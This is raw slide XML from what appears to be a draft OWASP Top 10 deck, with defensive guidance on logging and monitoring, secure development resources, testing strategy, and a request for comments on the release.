                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected.</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dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">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One strategy for determining if you have sufficient monitoring is to examine your logs following penetration testing. The testers actions should be recorded sufficiently to understand what damages they may have inflicted.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Most successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful exploit to nearly 100%. </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2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In 2016, identifying a breach took an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>average of 191 days</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – plenty of time for damage to be inflicted.</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454718441"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="819579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81000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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61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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Whether you are new to web application security or are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a:latin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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" kern="1200" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2895600"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" u="sng" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>secure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web application, you must define what secure means for that application. OWASP recommends you use the OWASP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7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)</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as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider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8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</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NB</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he annex is for US contract law, so please consult qualified legal advice before using the sample annex. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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Requirements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4085260"/>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Rather than retrofitting security into your applications and APIs, it is far more cost effective to design the security in from the start.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9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets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as a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good starting point for guidance on how to design security in from the beginning. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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Architecture</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33034" y="5099878"/>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Building strong and usable security controls is difficult. Using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set of standard security controls radically simplifies the development of secure applications and APIs.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Many modern frameworks now come with standard and effective security controls for authorization, validation, CSRF, etc.</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Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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Standard Security Controls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33034" y="6114496"/>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improve the process your organization follows when building applications and APIs,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0"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM)</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This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>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Secure Development Lifecycle</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7129115"/>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1"/>
                </a:rPr>
                <a:t>OWASP Education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provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try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2"/>
                </a:rPr>
                <a:t>WebGoat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3"/>
                </a:rPr>
                <a:t>WebGoat.NET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4"/>
                </a:rPr>
                <a:t>OWASP NodeJS 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5"/>
                </a:rPr>
                <a:t>OWASP Juice Shop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6"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications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To stay current, come to an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7"/>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7"/>
                </a:rPr>
                <a:t>AppSec</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7"/>
                </a:rPr>
                <a:t> Conference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OWASP Conference Training, or local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OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>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Education</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6" name="Textplatzhalter 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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27324" y="1310640"/>
            <a:ext cx="3489289" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Important Notice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3266610122"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="5657968" cy="4518660"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5657968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Request for Comments</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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27034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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is the Golden Master, and once released, only high priority changes and small typos will be fixed.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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>At this stage, we are asking for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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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Translations - we have some teams working already, but do reach out to us if you can help</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Very close review of the wording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Review diagrams and tables to make sure they are clear and useful</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If risk factors (exploitability, prevalence, detectability, impact) are concise and accurate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Vulnerability and Scenarios boxes are clear in meaning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Recommendations must </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>be actionable</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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Any OWASP or External links are high quality and agree in concept and tone with the Top 10’s content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CWE links must cover the content discussed in each risk. Do we need to add, change, or remove CWEs? Does the CWE need updating? If so, we have a very small window to work with MITRE to make it better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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We strongly urge for any corrections or issues to be logged at GitHub:</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hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.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Andrew van der Stock</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Brian </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Glas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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Neil Smithline</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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2" name="Textplatzhalter 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>GM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Golden Master</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11354688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564001304"/>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5630">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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8177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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it was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a:latin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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or so are long gone. Modern software development requires </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>continuous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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endParaRPr lang="en-US" sz="900" baseline="0" dirty="0">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11" name="Textplatzhalter 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Security Testing</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-876300" y="3124200"/>
            <a:ext cx="8670785" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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82800" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">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Before you start testing, be sure you understand what’s important to spend time on. Priorities come from the threat model, so if you don’t have one, you need to create one before testing.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Consider using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ASVS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and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rPr>
                <a:t>OWASP Testing Guide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as an input and d</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on’t rely on tool vendors to decide what’s importan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 for your business. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="9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Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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rPr>
                <a:t>Understand the Threat Model</a:t>
              </a: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4085260"/>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82800" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <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rPr>
                <a:t>Your approach to application security testing must</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9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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rPr>
                <a:t>Understand Your SDLC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>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82800" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAf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Choose the simplest, fastest, most accurate technique to verify each requirement.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6"/>
                </a:rPr>
                <a:t>OWASP Security Knowledge Framework</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Application Security Verification Standard</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Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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Testing Strategies</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33034" y="6114496"/>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82800" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
